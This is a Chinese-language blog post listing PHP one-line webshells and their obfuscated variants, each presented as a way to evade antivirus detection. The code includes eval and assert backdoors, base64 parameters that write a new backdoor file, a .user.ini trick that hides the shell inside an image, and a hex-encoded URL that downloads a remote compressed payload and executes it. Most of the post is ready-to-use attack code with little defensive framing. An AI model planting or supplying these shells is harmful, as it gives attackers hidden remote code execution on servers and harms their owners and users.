php一句话利用,常见php一句话webshell解析

我理解的 webshell 是在服务器上以 web server application (比如apache,iis或者nginx)的权限进行远程任意代码执行的工具。当然通过一些手段也可能可以进行提权。

最基础的 php webshell1<?php eval($_POST[CMD]);?>

将 post 请求中的 CMD 参数直接执行。

1<?php eval($_GET[CMD]);?>

原理浅析:

1、在PHP脚本语言中,eval(code)的功能是将code组合成php指令,然后将指令执行。

2、<?php $a=”phpinfo()”; eval(“echo $a; “); ?>

就相当于执行 echo phpinfo()语句。

变形一

为了与各种静态分析检测的杀毒软件进行对抗,webshell的代码也在不断进行混淆和改进。

1<?php $x=$_GET['z']; @eval("$x;");?>

一般的安全软件可能会将eval+GET或POST判定为后门程序,因此这种变形将eval和GET或者POST分开,能够绕过这种情况。

变形二

接收方

感觉这里并没有写对,应该是传入的两个参数都是base64加密的,经过解密后再执行,生成后门文件。

1

2

3<?php

$a=str_replace(x,"","axsxxsxexrxxt");$a($_POST["code"]);

?>

请求参数

1?code=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))

还原出的命令

1assert(fputs(fopen('c.php',w),"<?php @eval($_POST[a]);?>"))

利用assert来执行命令,并且用字符串隐藏assert方法,并且利用它加上动态传入参数的方式构造后门。

变形三1

2

3<?php

$_GET['a']($_GET['b']);

?>

请求参数

1?a=assert&b=fputs(fopen(base64_decode(J2MucGhwJw==),w),base64_decode("PD9waHAgQGV2YWwoJF9QT1NUW2FdKTs/Pg=="))

完全利用动态参数传入的方式构造后门,将敏感函数和执行的命令动态传入,效果与变形二是一致的。

变形四1($code = $_POST['code']) &&@preg_replace('/ad/e','@'.str_rot13('riny').'($code)', 'add')

改进的地方:

首先,将eval函数用str_rot13(‘riny’)隐藏。

然后,利用 e 修饰符,在preg_replace完成字符串替换后,使得引擎将结果字符串作为php代码使用eval方式进行评估并将返回值作为最终参与替换的字符串。

变形五1$filename=$_GET['code']; include ($filename);

改进的地方:

由于include方法可以直接编译任何格式的文件为php格式运行,因此可以上传一个txt格式的php文件,将真正的后门写在文本当中。

变形六1auto_prepend_file=code.gif

上传.user.ini,并且写入auto_prepend_file=code.gif

将一句话隐藏在code.gif中,并且将它上传到同一目录下。

改进的地方:

将一句话木马隐藏在图形文件中,并且利用用户配置文件将其自动加载到同目录的php文件下,使得所有正常php文件都毫不知情的中招。

变形七1

2if(empty($_SESSION['api']))$_SESSION['api']=substr(file_get_contents(sprintf('%s?%s',pack("H*",'687474703a2f2f377368656c6c2e676f6f676c65636f64652e636f6d2f73766e2f6d616b652e6a7067'),uniqid())),3649);

@preg_replace("~(.*)~ies",gzuncompress($_SESSION['api']),null);

改进的地方:

第一,通过pack函数得到URL

第二,利用file_get_contents获得make.jpg。

第三,利用substr截取3649字节以后的内容。

第四,利用gzuncompress方法将3649字节以后的内容解压出来。

第五,用preg_replace方法的e操作符将代码执行。

还有很多后续操作……

后记

以上为了试验操作的方便,采用的是Get方式获取PHP的执行代码,但实际上,由于URL长度的限制,一般采用Post的方式。由于PHP版本的不断更新,因此一些旧的方法可能已经不太好用,但是随着版本的更新,相信也会有更多越来越新奇的mm慢慢浮出水面,让我们拭目以待。

另外除了这些一句话以外,还有一些不错的大马,例如rc-shell等,以及github上大量的webshell仓库。

参考资料

  • 2
    点赞
  • 1
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值